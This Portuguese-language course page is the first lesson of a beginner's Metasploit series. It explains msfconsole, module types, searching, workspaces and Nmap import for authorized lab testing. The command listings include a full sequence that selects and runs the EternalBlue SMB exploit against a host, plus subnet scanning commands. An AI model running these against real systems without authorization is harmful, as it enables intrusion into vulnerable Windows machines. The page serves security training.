0Pricing
Cyber Security Academy · Aula

Arquitetura do Metasploit e msfconsole

Navegue pelo msfconsole, compreenda a estrutura de exploits, cargas e módulos e configure as opções.

Arquitetura do Metasploit e msfconsole é uma aula grátis de Cyber Security Academy no CoddyKit. Esta é a aula 1 de 4. Você pode ler a aula completa abaixo gratuitamente — depois pratica ao vivo no navegador com um editor de código integrado e um tutor de IA 24/7. Faz parte do caminho de aprendizado de Cyber Security Academy, e seu progresso é sincronizado entre a web e o app CoddyKit. O curso de Cyber Security Academy inclui 4 aulas no total.

O que é o Metasploit?

O Metasploit Framework é uma plataforma de código aberto para testes de invasão que fornece uma interface unificada para desenvolver, testar e executar explorações. É a ferramenta padrão do setor para exploração autorizada em ambientes de laboratório.

Componentes do Metasploit

Componentes principais: msfconsole (CLI interativa), msfvenom (gerador de cargas úteis), Metasploit DB (PostgreSQL para armazenar hosts e sessões) e Armitage (interface frontal com GUI).

Iniciando o msfconsole

Inicie o msfconsole e inicialize o banco de dados. O prompt muda para msf6 >. O preenchimento por tabulação funciona em todos os comandos, nomes de módulos e opções.

# Start msfconsole
msfconsole

# Initialize database (if needed)
msfdb init
msfdb start

# Check DB connection
msf6 > db_status
# [*] Connected to msf. Connection type: postgresql.

Tipos de módulos

O Metasploit organiza os recursos em tipos de módulos: exploit (código de ataque específico para vulnerabilidades), payload (código executado após a exploração), auxiliary (rastreadores e geradores de entradas aleatórias), post (pós-exploração), encoder e nop.

msf6 > show exploits       # list exploit modules
msf6 > show auxiliary      # list auxiliary modules
msf6 > show payloads       # list payloads
msf6 > show post           # post-exploitation modules

Pesquisando módulos

O comando search filtra módulos por nome, CVE, plataforma ou classificação. A classificação do módulo indica sua confiabilidade: Excellent > Great > Good > Normal > Average > Low.

msf6 > search type:exploit name:eternalblue
msf6 > search cve:2021-44228
msf6 > search platform:windows smb
msf6 > search rank:excellent ms17

Usando um módulo de exploração

Selecione um módulo com use, visualize as opções necessárias com show options, defina os valores com set e execute com run ou exploit.

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(ms17_010_eternalblue) > show options
msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.100
msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.1.10
msf6 exploit(ms17_010_eternalblue) > run

Definindo opções globais

setg define opções globalmente para todos os módulos seguintes — é útil para LHOST, LPORT e RHOSTS que permanecem constantes durante todo o trabalho.

msf6 > setg LHOST 192.168.1.10
msf6 > setg LPORT 4444

# Unset global
msf6 > unsetg LHOST

Módulos auxiliares

Os módulos auxiliares realizam rastreamento, enumeração e geração de entradas aleatórias sem entregar cargas úteis. Exemplos: rastreador de versão do SMB, tentativa automatizada de força bruta de login por SSH e rastreador de diretórios HTTP.

msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(smb_version) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(smb_version) > set THREADS 10
msf6 auxiliary(smb_version) > run

Gerenciamento de áreas de trabalho

As áreas de trabalho organizam dados de rastreamento e sessões por trabalho. Crie uma nova área de trabalho no início de cada avaliação para manter os dados separados.

msf6 > workspace                 # list workspaces
msf6 > workspace -a lab_test     # create
msf6 > workspace lab_test        # switch
msf6 > hosts                     # show discovered hosts
msf6 > services                  # show discovered services

Integração com o Nmap

Importe diretamente os resultados do rastreamento XML do Nmap para o banco de dados do Metasploit, preenchendo as tabelas de hosts e serviços e permitindo a seleção direcionada de módulos.

msf6 > db_nmap -sV 192.168.1.0/24
# Or import existing XML:
msf6 > db_import /path/to/scan.xml
msf6 > hosts
msf6 > services -p 445

Ajuda e documentação

Todos os módulos têm documentação integrada. Use info para ler a descrição do módulo, a classificação de confiabilidade, as referências (CVEs, recomendações de segurança) e as opções necessárias.

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > info

# Shows: description, CVE references,
# platform, architecture, reliability rank

Verificação rápida

Qual comando seleciona um módulo no msfconsole?

Resumo: arquitetura do Metasploit

O msfconsole é o núcleo central: pesquise módulos, defina opções, execute explorações e gerencie sessões. Trabalhe sempre dentro de uma área de trabalho nomeada, importe os resultados do Nmap para preencher o banco de dados e leia as informações do módulo antes de executar qualquer coisa — entenda o que está executando e por quê.

Perguntas Frequentes

A aula “Arquitetura do Metasploit e msfconsole” é grátis?

Sim — o texto completo de “Arquitetura do Metasploit e msfconsole” é grátis para ler aqui na web. Para praticá-la interativamente (um editor de código integrado e um tutor de IA 24/7) e desbloquear o restante do curso de Cyber Security Academy, atualize para CoddyKit PRO. O curso de Cyber Security Academy inclui 4 aulas no total.

O que vou aprender em “Arquitetura do Metasploit e msfconsole”?

Navegue pelo msfconsole, compreenda a estrutura de exploits, cargas e módulos e configure as opções. Você pratica Cyber Security Academy com código prático que executa diretamente no navegador, e um tutor de IA 24/7 responde suas dúvidas enquanto trabalha na aula.

Preciso ter experiência prévia para começar Cyber Security Academy?

Nenhuma experiência prévia é necessária. Cyber Security Academy no CoddyKit é estruturado para alunos iniciantes até avançados, então você pode começar aqui ou desde o início e aprender no seu ritmo. Esta é a aula 1 de 4.

Quanto tempo leva a aula “Arquitetura do Metasploit e msfconsole”?

A maioria das aulas CoddyKit leva cerca de 5–10 minutos. Cada uma é compacta e interativa, então você faz progresso constante e retoma exatamente de onde parou entre web e app.

Posso escrever e executar código nesta aula de Cyber Security Academy?

Sim. Cada aula de Cyber Security Academy inclui um editor de código integrado, então você escreve e executa código real direto no navegador e recebe feedback de IA instantaneamente — nenhuma configuração local necessária.

Todas as aulas deste curso

  1. Arquitetura do Metasploit e msfconsole
  2. Exploração de uma Vulnerabilidade Conhecida
  3. Cargas: em Estágios ou sem Estágios, Meterpreter
  4. Pós-Exploração: Pivotar e Persistir
← Voltar para Cyber Security Academy